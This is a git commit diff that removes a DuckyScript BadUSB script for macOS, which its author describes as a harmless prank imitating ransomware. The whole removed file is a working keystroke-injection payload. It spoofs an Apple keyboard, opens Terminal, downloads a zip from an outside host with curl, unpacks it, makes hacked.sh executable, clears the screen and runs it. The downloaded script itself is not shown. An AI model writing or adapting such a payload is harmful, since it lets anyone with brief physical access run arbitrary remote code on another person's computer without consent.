Delete badusb/corteximplant-ransomware.txt

This commit is contained in:
Ramses Revengeday 2024-09-04 20:43:24 +00:00
parent ec8a87637c
commit 658434ffea

View file

@ -1,40 +0,0 @@
REM -----
REM Useless fun BadUSB script meant to imitate ransomware.
REM Open corteximplant.org in Safari and then
REM download hacked.sh, a bash script with the appearance of randomware.
REM
REM Created by Revengeday
REM Fedi: @revengeday@corteximplant.com
REM -----
ID 1234:5678 Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING safari
ENTER
DELAY 1500
STRING corteximplant.org
ENTER
DELAY 1500
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1500
STRING curl -O https://corteximplant.org/stuff/hacked.zip
ENTER
DELAY 5000
STRING unzip hacked.zip
ENTER
DELAY 1500
STRING rm hacked.zip
ENTER
DELAY 1500
STRING chmod +x hacked.sh
ENTER
DELAY 1500
STRING clear
ENTER
DELAY 500
STRING ./hacked.sh
ENTER